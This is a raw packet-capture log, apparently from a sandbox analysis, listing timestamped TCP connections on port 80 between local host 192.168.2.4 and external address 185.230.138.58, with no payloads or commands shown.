                                                                                                                                        Dec 21, 2024 10:10:38.916306019 CET8050157185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:38.921370983 CET5015880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:39.041691065 CET8050158185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:39.693727016 CET8050157185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:39.749427080 CET5015780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:39.816725016 CET8050158185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:39.874442101 CET5015880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:39.929838896 CET8050157185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:39.983814955 CET5015780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.049680948 CET8050158185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:40.093177080 CET5015880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.167556047 CET5015980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.167556047 CET5015780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.167825937 CET5015880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.287389040 CET8050159185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:40.287465096 CET5015980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.287619114 CET8050157185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:40.287667036 CET5015780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.287832022 CET5015980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.288674116 CET8050158185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:40.288726091 CET5015880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.407419920 CET8050159185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:40.640222073 CET5015980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:40.759998083 CET8050159185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:41.531744957 CET8050159185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:41.578280926 CET5015980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:41.765291929 CET8050159185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:41.812361956 CET5015980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:41.888931036 CET5016080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:42.008795977 CET8050160185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:42.008915901 CET5016080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:42.009125948 CET5016080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:42.128799915 CET8050160185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:42.358906984 CET5016080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:42.478660107 CET8050160185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:43.253628969 CET8050160185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:43.312931061 CET5016080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:43.489464998 CET8050160185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:43.532929897 CET5016080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:43.604336977 CET5016180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:43.604623079 CET5016080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:43.723994017 CET8050161185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:43.724684954 CET8050160185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:43.725008965 CET5016080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:43.725014925 CET5016180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:43.774985075 CET5016180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:43.894570112 CET8050161185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:44.124633074 CET5016180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:44.245703936 CET8050161185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:44.938002110 CET5016180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:44.938122034 CET5016280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:44.975179911 CET8050161185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:44.975241899 CET5016180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:45.057708025 CET8050162185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:45.057885885 CET5016280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:45.057952881 CET8050161185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:45.057976961 CET5016280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:45.058016062 CET5016180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:45.072030067 CET5016380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:45.177659988 CET8050162185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:45.191740990 CET8050163185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:45.191811085 CET5016380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:45.191951036 CET5016380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:45.311404943 CET8050163185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:45.409055948 CET5016280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:45.528780937 CET8050162185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:45.528877974 CET8050162185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:45.546446085 CET5016380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:45.666213989 CET8050163185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:46.303715944 CET8050162185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:46.358863115 CET5016280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.437100887 CET8050163185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:46.515130997 CET5016380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.541459084 CET8050162185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:46.593234062 CET5016280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.669677973 CET8050163185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:46.795046091 CET5016380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.825160027 CET5015980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.831577063 CET5016280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.831583977 CET5016380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.831861973 CET5016480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.952303886 CET8050164185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:46.952322006 CET8050162185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:46.952413082 CET5016280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.952425003 CET5016480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.952605009 CET5016480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:46.952673912 CET8050163185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:46.952732086 CET5016380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:47.076211929 CET8050164185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:47.316987991 CET5016480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:47.436834097 CET8050164185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:48.206814051 CET8050164185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:48.249510050 CET5016480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:48.441368103 CET8050164185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:48.483884096 CET5016480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:48.561410904 CET5016580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:48.681066990 CET8050165185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:48.681152105 CET5016580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:48.681325912 CET5016580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:48.802829981 CET8050165185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:49.030859947 CET5016580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:49.155836105 CET8050165185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:49.934982061 CET8050165185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:50.015167952 CET5016580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:50.169610977 CET8050165185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:50.295655012 CET5016580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:50.295948982 CET5016680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:50.415710926 CET8050166185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:50.415788889 CET5016680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:50.415936947 CET5016680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:50.415970087 CET8050165185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:50.416026115 CET5016580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:50.535510063 CET8050166185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:50.765264988 CET5016680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:50.888679028 CET8050166185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:51.547142029 CET5016780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:51.547146082 CET5016680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:51.659486055 CET8050166185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:51.659709930 CET5016680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:51.667088032 CET8050167185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:51.667145967 CET5016880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:51.667290926 CET5016780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:51.667396069 CET8050166185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:51.667448997 CET5016780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:51.667669058 CET5016680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:51.786875010 CET8050168185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:51.786937952 CET8050167185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:51.786979914 CET5016880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:51.787120104 CET5016880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:51.906761885 CET8050168185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:52.019341946 CET5016780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:52.139451981 CET8050167185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:52.139494896 CET8050167185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:52.143369913 CET5016880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:52.263247013 CET8050168185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:52.932327032 CET8050167185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:52.983947992 CET5016780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.033644915 CET8050168185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:53.165745974 CET8050167185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:53.168173075 CET5016480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.176270962 CET5016880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.218317986 CET5016780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.265532970 CET8050168185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:53.315376043 CET5016880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.386534929 CET5016980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.386554956 CET5016780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.386651039 CET5016880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.506347895 CET8050169185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:53.506479979 CET5016980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.507540941 CET8050167185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:53.507652998 CET8050168185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:53.507796049 CET5016880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.507797003 CET5016780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.511076927 CET5017080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.630672932 CET8050170185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:53.631419897 CET5017080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.631603003 CET5017080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:53.751415014 CET8050170185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:53.987160921 CET5017080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:54.107558966 CET8050170185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:54.876152039 CET8050170185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:54.921453953 CET5017080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:55.109652042 CET8050170185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:55.155992985 CET5017080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:55.233164072 CET5017180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:55.233161926 CET5017080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:55.353319883 CET8050171185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:55.353528976 CET8050170185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:55.357326031 CET5017180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:55.357450008 CET5017080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:55.357531071 CET5017180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:55.477153063 CET8050171185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:55.705040932 CET5017180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:55.824826002 CET8050171185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:56.602555990 CET8050171185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:56.647012949 CET5017180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:56.841480017 CET8050171185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:56.968401909 CET5017280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:57.004956961 CET5017180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:57.088447094 CET8050172185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:57.088530064 CET5017280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:57.088713884 CET5017280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:57.208334923 CET8050172185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:57.437449932 CET5017280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:57.557307005 CET8050172185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:58.172188997 CET5017280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.172267914 CET5017380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.292152882 CET8050173185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:58.292234898 CET5017380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.292304993 CET8050172185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:58.292366028 CET5017280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.292431116 CET5017380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.298578024 CET5017480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.411967039 CET8050173185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:58.418286085 CET8050174185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:58.418355942 CET5017480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.418545008 CET5017480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.538187027 CET8050174185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:58.640582085 CET5017380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.761173010 CET8050173185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:58.761233091 CET8050173185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:58.775024891 CET5017480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:58.895337105 CET8050174185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:59.540361881 CET8050173185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:59.662384987 CET8050174185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:59.702774048 CET5017380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:59.702769041 CET5017480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:59.773777008 CET8050173185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:59.897562981 CET8050174185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:59.999696016 CET5017380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.000045061 CET5017480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.010507107 CET5017480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.010528088 CET5017380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.011183977 CET5017580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.131505013 CET8050174185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:00.131654978 CET5017480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.131658077 CET8050175185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:00.131831884 CET5017580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.131901979 CET5017580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.132117033 CET8050173185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:00.132225037 CET5017380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.252011061 CET8050175185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:00.484154940 CET5017580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:00.604444027 CET8050175185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:01.393105984 CET8050175185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:01.437149048 CET5017580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:01.625623941 CET8050175185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:01.675342083 CET5017580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:01.839385033 CET5017680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:01.960401058 CET8050176185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:01.960680008 CET5017680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:01.961004019 CET5017680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:02.082416058 CET8050176185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:02.312256098 CET5017680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:02.435384035 CET8050176185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:03.207375050 CET8050176185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:03.315237045 CET5017680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:03.445801973 CET8050176185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:03.515405893 CET5017680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:03.573596954 CET5017680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:03.573712111 CET5017580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:03.573713064 CET5017180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:03.575273037 CET5017780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:03.693677902 CET8050176185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:03.694437981 CET5017680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:03.694938898 CET8050177185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:03.695066929 CET5017780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:03.699279070 CET5017780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:03.819864035 CET8050177185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:04.047250986 CET5017780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:04.168541908 CET8050177185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:04.781692982 CET5017880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:04.782072067 CET5017780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:04.902612925 CET8050178185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:04.902693987 CET5017880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:04.902996063 CET5017880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:04.903439045 CET8050177185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:04.903506041 CET5017780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:04.906896114 CET5017980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:05.023794889 CET8050178185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:05.027679920 CET8050179185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:05.027753115 CET5017980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:05.028018951 CET5017980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:05.148802996 CET8050179185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:05.249780893 CET5017880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:05.369757891 CET8050178185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:05.376980066 CET5017980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:05.385848999 CET8050178185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:05.496743917 CET8050179185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:06.149772882 CET8050178185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:06.205157042 CET5017880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.275434017 CET8050179185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:06.381797075 CET8050178185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:06.424575090 CET5017980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.437184095 CET5017880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.513686895 CET8050179185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:06.641340017 CET5017880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.641534090 CET5017980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.641849995 CET5018080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.761420012 CET8050178185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:06.761451960 CET8050180185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:06.761492968 CET5017880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.761550903 CET5018080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.761768103 CET8050179185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:06.761816025 CET5017980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.761969090 CET5018080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:06.881570101 CET8050180185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:07.120630026 CET5018080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:07.240551949 CET8050180185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:08.006403923 CET8050180185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:08.047310114 CET5018080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:08.241724968 CET8050180185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:08.296585083 CET5018080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:08.360122919 CET5018080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:08.360462904 CET5018180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:08.480163097 CET8050181185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:08.480243921 CET5018180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:08.480313063 CET8050180185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:08.480398893 CET5018080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:08.480504990 CET5018180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:08.601665020 CET8050181185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:08.827971935 CET5018180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:08.947702885 CET8050181185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:09.734451056 CET8050181185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:09.812335968 CET5018180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:09.970367908 CET8050181185.230.138.58192.168.2.4
